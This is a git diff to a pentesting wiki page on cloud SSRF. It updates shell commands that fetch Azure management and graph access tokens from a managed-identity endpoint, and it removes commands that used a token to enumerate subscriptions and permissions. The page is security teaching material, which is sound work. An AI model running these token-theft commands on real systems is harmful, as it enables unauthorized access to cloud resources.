diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 7d272d781..dd19a3f76 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -482,26 +482,13 @@ Most of the time, you want a token for one of these resources: echo $IDENTITY_HEADER echo $IDENTITY_ENDPOINT -# You should also be able to find the folder: +# (Fingerprint) You should also be able to find the folder: ls /opt/microsoft -#and the file -ls /opt/microsoft/msodbcsql17 # Get management token -curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER +curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER # Get graph token -curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER - -# API -# Get Subscriptions -URL="https://management.azure.com/subscriptions?api-version=2020-01-01" -curl -H "Authorization: $TOKEN" "$URL" -# Get current permission on resources in the subscription -URL="https://management.azure.com/subscriptions//resources?api-version=2020-10-01'" -curl -H "Authorization: $TOKEN" "$URL" -# Get permissions in a VM -URL="https://management.azure.com/subscriptions//resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines//providers/Microsoft.Authorization/permissions?api-version=2015-07-01" -curl -H "Authorization: $TOKEN" "$URL" +curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER ``` ```powershell @@ -650,4 +637,3 @@ Learn & practice GCP Hacking: {% endhint %} -